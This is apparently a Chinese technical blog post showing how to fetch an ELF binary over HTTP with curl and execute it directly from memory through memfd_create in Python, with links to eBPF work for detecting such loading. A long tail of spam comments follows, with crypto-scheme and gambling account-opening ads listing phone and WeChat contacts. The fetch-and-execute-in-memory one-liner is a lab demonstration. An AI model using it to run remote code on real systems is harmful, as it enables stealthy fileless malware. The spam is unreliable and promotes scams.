参看
Using eBPF to uncover in-memory loading - Pat H [2021-02-15]
https://blog.tofile.dev/2021/02/15/ebpf-01.html作者给了一个完整示例,从内存中直接加载执行ELF。bluerust推荐过memfd_create,但我现在很少用C编程,未实践过。Pat H给了Python版示例,演示效果极佳。
假设WEB服务在此
cp /usr/bin/id .
python3 -m http.server -b 192.168.65.25 8080在客户端验证WEB服务正常
curl -s http://192.168.65.25:8080/id | xxd -s 0 -l 32 -g 1在客户端确认memfd_create系统调用号是319
$ grep "__NR_memfd_create" /usr/include/asm/unistd_64.h
#define __NR_memfd_create 319在客户端用curl远程拉id回来,不写硬盘,直接执行
curl -s http://192.168.65.25:8080/id | python3 -c '
import sys, os, ctypes
libc = ctypes.CDLL( "libc.so.6" )
memfd_create = 319
fd = libc.syscall( memfd_create, "", 0 )
data = sys.stdin.buffer.read()
os.write( fd, data )
path = f"/proc/self/fd/{fd}"
os.execv( path, [path,] )
'参看
BPF-PipeSnoop
https://github.com/pathtofile/bpf-pipesnoopPat H用eBPF实现对shell管道操作的监控,这是个C项目,应该可以改写成BCC项目。
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
555
1
1
1
1
1
1
1
1
555
555
555
555
555
555
555
555
555
1
1
1
1
1
555
1
1
1
1
1
1
1
555
1
1
555
1
1
1
1
1
1
1
1
1
1
1
1
1
555
1
555
1
1
1
555
1
1
1
1
1
1
1
555
555
555
每次看到你的文章,我都觉得时间过得好快。http://www.bjliye.com
你的才华横溢,让人敬佩。http://www.xfuda.com
看到你的文章,我仿佛感受到了生活中的美好。 https://www.yonboz.com/video/54579.html
你的文章充满了智慧,让人敬佩。 https://www.yonboz.com/video/41591.html
看到你的文章,我仿佛感受到了生活中的美好。 https://www.4006400989.com/qyvideo/23580.html
文章中的实用建议和操作指南,让读者受益匪浅,值得珍藏。
批判锋芒犀利,直指问题症结所在。
对传统与现代的融合思考颇具启发性。
字里行间流露出真挚的情感,让人感同身受,共鸣不已。
这篇文章不错!
1
555
1
1
1
1
1
1
1
555
1
1
1
555
1
1
1
555
1
555
1
新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
新车即将上线 真正的项目,期待你的参与
2025年10月新盘 做第一批吃螃蟹的人coinsrore.com
新车新盘 嘎嘎稳 嘎嘎靠谱coinsrore.com
新车首发,新的一年,只带想赚米的人coinsrore.com
新盘 上车集合 留下 我要发发 立马进裙coinsrore.com
做了几十年的项目 我总结了最好的一个盘(纯干货)coinsrore.com
新车上路,只带前10个人coinsrore.com
新盘首开 新盘首开 征召客户!!!coinsrore.com
新项目准备上线,寻找志同道合的合作伙伴coinsrore.com
新车即将上线 真正的项目,期待你的参与coinsrore.com
新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
新盘新盘 这个月刚上新盘 新车第一个吃螃蟹!coinsrore.com
2025年10月新盘 做第一批吃螃蟹的人coinsrore.com
新车新盘 嘎嘎稳 嘎嘎靠谱coinsrore.com
新车首发,新的一年,只带想赚米的人coinsrore.com
新盘 上车集合 留下 我要发发 立马进裙coinsrore.com
做了几十年的项目 我总结了最好的一个盘(纯干货)coinsrore.com
新车上路,只带前10个人coinsrore.com
新盘首开 新盘首开 征召客户!!!coinsrore.com
新项目准备上线,寻找志同道合的合作伙伴coinsrore.com
新车即将上线 真正的项目,期待你的参与coinsrore.com
新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
新盘新盘 这个月刚上新盘 新车第一个吃螃蟹!coinsrore.com
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳公司合作开户所需材料?电话号码15587291507 微信STS5099
华纳东方明珠客服电话是多少?(▲18288362750?《?微信STS5099? 】
如何联系华纳东方明珠客服?(▲18288362750?《?微信STS5099? 】
华纳东方明珠官方客服联系方式?(▲18288362750?《?微信STS5099?
华纳东方明珠客服热线?(▲18288362750?《?微信STS5099?
华纳东方明珠24小时客服电话?(▲18288362750?《?微信STS5099? 】
华纳东方明珠官方客服在线咨询?(▲18288362750?《?微信STS5099?
华纳东方明珠客服电话是多少?(??155--8729--1507?《?薇-STS5099】【?扣6011643?】
华纳东方明珠开户专线联系方式?(??155--8729--1507?《?薇-STS5099】【?扣6011643?】
新盛客服电话是多少?(?183-8890-9465—《?薇-STS5099】【
新盛开户专线联系方式?(?183-8890--9465—《?薇-STS5099】【?扣6011643??】
新盛客服开户电话全攻略,让娱乐更顺畅!(?183-8890--9465—《?薇-STS5099】客服开户流程,华纳新盛客服开户流程图(?183-8890--9465—《?薇-STS5099】
果博东方客服开户联系方式【182-8836-2750—】?薇- cxs20250806】
果博东方公司客服电话联系方式【182-8836-2750—】?薇- cxs20250806】
果博东方开户流程【182-8836-2750—】?薇- cxs20250806】
果博东方客服怎么联系【182-8836-2750—】?薇- cxs20250806】